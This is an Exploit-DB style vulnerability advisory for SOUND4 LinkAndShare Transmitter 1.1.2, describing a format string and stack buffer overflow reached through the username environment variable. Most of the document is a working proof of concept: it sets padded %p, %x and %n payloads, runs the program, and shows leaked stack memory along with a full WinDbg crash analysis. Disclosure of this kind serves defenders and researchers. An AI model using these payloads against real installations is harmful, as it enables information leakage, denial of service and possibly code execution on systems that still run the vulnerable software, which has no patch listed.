SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow

vendor:
SOUND4 LinkAndShare Transmitter
by:
LiquidWorm
7.5
CVSS
HIGH
Format String Stack Buffer Overflow
134
CWE
Product Name: SOUND4 LinkAndShare Transmitter
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: NO
Related CWE:
CPE: sound4:linkandshare_transmitter:1.1.2
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2022
SOUND4 LinkAndShare Transmitter 1.1.2 – Format String Stack Buffer Overflow

The application suffers from a format string memory leak and stack buffer overflow vulnerability because it fails to properly sanitize user supplied input when calling the getenv() function from MSVCR120.DLL resulting in a crash overflowing the memory stack and leaking sensitive information. The attacker can abuse the username environment variable to trigger and potentially execute code on the affected system.
Mitigation:

Apply the vendor's patch or update to the latest version.
Source
Exploit-DB raw data:

# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow
# Exploit Author: LiquidWorm


Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 1.1.2

Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that
allow users to remotely control SOUND4 processors through a network connection.
SOUND4 offers a tool that manage sending L&S commands to your processors:
the Link&Share Transmitter.

Desc: The application suffers from a format string memory leak and stack
buffer overflow vulnerability because it fails to properly sanitize user
supplied input when calling the getenv() function from MSVCR120.DLL resulting
in a crash overflowing the memory stack and leaking sensitive information.
The attacker can abuse the username environment variable to trigger and
potentially execute code on the affected system.

---------------------------------------------------------------------------
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29            int     29h
---------------------------------------------------------------------------

Tested on: Microsoft Windows 10 Home


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5744
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php


26.09.2022

--


C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe

C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file
02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


---


C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe

(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29            int     29h
0:000> kb
 # ChildEBP RetAddr  Args to Child              
00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 
01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] 
02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] 
03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] 
04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] 
*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] 
WARNING: Stack unwind information not available. Following frames may be wrong.
06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP: 
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
645046b1 cd29            int     29h

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e)
   ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 00000005
Subcode: 0x5 FAST_FAIL_INVALID_ARG

FAULTING_THREAD:  000059e8
DEFAULT_BUCKET_ID:  FAIL_FAST_INVALID_ARG
PROCESS_NAME:  LinkAndShareTransmitter.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE_STR:  c0000409
EXCEPTION_PARAMETER1:  00000005
WATSON_BKT_PROCSTAMP:  6144495e
WATSON_BKT_PROCVER:  1.1.0.2
PROCESS_VER_PRODUCT:  Sound4 Link&Share Transmitter
WATSON_BKT_MODULE:  MSVCR120.dll
WATSON_BKT_MODSTAMP:  577e0f1e
WATSON_BKT_MODOFFSET:  a46b1
WATSON_BKT_MODVER:  12.0.40660.0
MODULE_VER_PRODUCT:  Microsoft® Visual Studio® 2013
BUILD_VERSION_STRING:  10.0.19041.2364 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH:  938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5
MODLIST_SHA1_HASH:  5990094944fb37a3f4c159affa51a53b6a58ac20
NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
PRODUCT_TYPE:  1
SUITE_MASK:  784
DUMP_TYPE:  fe
ANALYSIS_SESSION_HOST:  LAB17
ANALYSIS_SESSION_TIME:  01-29-2023 16:09:48.0143
ANALYSIS_VERSION: 10.0.16299.91 x86fre
THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

PROBLEM_CLASSES: 

    ID:     [0n270]
    Type:   [FAIL_FAST]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [Unspecified]
    Frame:  [0]

    ID:     [0n257]
    Type:   [INVALID_ARG]
    Class:  Addendum
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [Unspecified]
    Frame:  [0]

BUGCHECK_STR:  FAIL_FAST_INVALID_ARG
PRIMARY_PROBLEM_CLASS:  FAIL_FAST
LAST_CONTROL_TRANSFER:  from 64504677 to 645046b1

STACK_TEXT:  
0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe
0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a
0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc
0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49
0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81
0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16
WARNING: Stack unwind information not available. Following frames may be wrong.
0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC:  0b8f8316052b30cae637e16edbb425a676500e95
THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  359d5607a5627480201647a1bc659e9d2ac9281f
THREAD_SHA1_HASH_MOD:  2418d74468f3882fef267f455cd32d7651645882

FOLLOWUP_IP: 
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
645046b1 cd29            int     29h

FAULT_INSTR_CODE:  6a5629cd
FAULTING_SOURCE_LINE:  f:\dd\vctools\crt\crtw32\misc\invarg.c
FAULTING_SOURCE_FILE:  f:\dd\vctools\crt\crtw32\misc\invarg.c
FAULTING_SOURCE_LINE_NUMBER:  132
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  MSVCR120!_invoke_watson+e
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: MSVCR120
IMAGE_NAME:  MSVCR120.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  577e0f1e
BUCKET_ID:  FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e
FAILURE_EXCEPTION_CODE:  c0000409
FAILURE_IMAGE_NAME:  MSVCR120.dll
BUCKET_ID_IMAGE_STR:  MSVCR120.dll
FAILURE_MODULE_NAME:  MSVCR120
BUCKET_ID_MODULE_STR:  MSVCR120
FAILURE_FUNCTION_NAME:  _invoke_watson
BUCKET_ID_FUNCTION_STR:  _invoke_watson
BUCKET_ID_OFFSET:  e
BUCKET_ID_MODTIMEDATESTAMP:  577e0f1e
BUCKET_ID_MODCHECKSUM:  f8aef
BUCKET_ID_MODVER_STR:  12.0.40660.0
BUCKET_ID_PREFIX_STR:  FAIL_FAST_INVALID_ARG_
FAILURE_PROBLEM_CLASS:  FAIL_FAST
FAILURE_SYMBOL_NAME:  MSVCR120.dll!_invoke_watson
FAILURE_BUCKET_ID:  FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1
TARGET_TIME:  2023-01-29T15:09:52.000Z
OSBUILD:  19044
OSSERVICEPACK:  2364
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE:  x86
OSNAME:  Windows 10
OSEDITION:  Windows 10 WinNt SingleUserTS Personal
USER_LCID:  0
OSBUILD_TIMESTAMP:  2008-01-07 11:33:18
BUILDDATESTAMP_STR:  160101.0800
BUILDLAB_STR:  WinBuild
BUILDOSVER_STR:  10.0.19041.2364
ANALYSIS_SESSION_ELAPSED_TIME:  635d
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson
FAILURE_ID_HASH:  {c9fee478-4ed1-0d2b-ddd7-dca655d9817f}

Followup:     MachineOwner
---------

0:000> d MSVCP120
70fb0000  4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00  MZ..............
70fb0010  b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00  ........@.......
70fb0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
70fb0030  00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00  ................
70fb0040  0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68  ........!..L.!Th
70fb0050  69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f  is program canno
70fb0060  74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20  t be run in DOS 
70fb0070  6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00  mode....$.......
0:000> lmvm MSVCR120
Browse full module list
start    end        module name
64460000 6454e000   MSVCR120   (private pdb symbols)  C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb
    Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll
    Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll
    Image name: MSVCR120.dll
    Browse all global symbols  functions  data
    Timestamp:        Thu Jul  7 10:13:18 2016 (577E0F1E)
    CheckSum:         000F8AEF
    ImageSize:        000EE000
    File version:     12.0.40660.0
    Product version:  12.0.40660.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Microsoft® Visual Studio® 2013
    InternalName:     msvcr120.dll
    OriginalFilename: msvcr120.dll
    ProductVersion:   12.00.40660.0
    FileVersion:      12.00.40660.0 built by: VSULDR
    FileDescription:  Microsoft® C Runtime Library
    LegalCopyright:   © Microsoft Corporation. All rights reserved.
0:000> x /D /f MSVCR120!getenv
 MSVCR120!getenv (char *)
0:000> x /D /f MSVCR120!getenv
64477785          MSVCR120!getenv (char *)
..
0:000> u 64477785
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
64477785 6a0c            push    0Ch
64477787 68f0774764      push    offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
6447778c e8ea75ffff      call    MSVCR120!__SEH_prolog4 (6446ed7b)
64477791 8365e400        and     dword ptr [ebp-1Ch],0
64477795 33c0            xor     eax,eax
64477797 8b7508          mov     esi,dword ptr [ebp+8]
6447779a 85f6            test    esi,esi
6447779c 0f95c0          setne   al
0:000> r
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29            int     29h
0:000> u 645046b1
MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]:
645046b1 cd29            int     29h
645046b3 56              push    esi
645046b4 6a01            push    1
645046b6 be170400c0      mov     esi,0C0000417h
645046bb 56              push    esi
645046bc 6a02            push    2
645046be e85efeffff      call    MSVCR120!_call_reportfault (64504521)
645046c3 56              push    esi
0:000> u 64477785
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
64477785 6a0c            push    0Ch
64477787 68f0774764      push    offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
6447778c e8ea75ffff      call    MSVCR120!__SEH_prolog4 (6446ed7b)
64477791 8365e400        and     dword ptr [ebp-1Ch],0
64477795 33c0            xor     eax,eax
64477797 8b7508          mov     esi,dword ptr [ebp+8]
6447779a 85f6            test    esi,esi
6447779c 0f95c0          setne   al
0:000> g
WARNING: Continuing a non-continuable exception
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29            int     29h


---


C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe

C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file
02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b.
.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA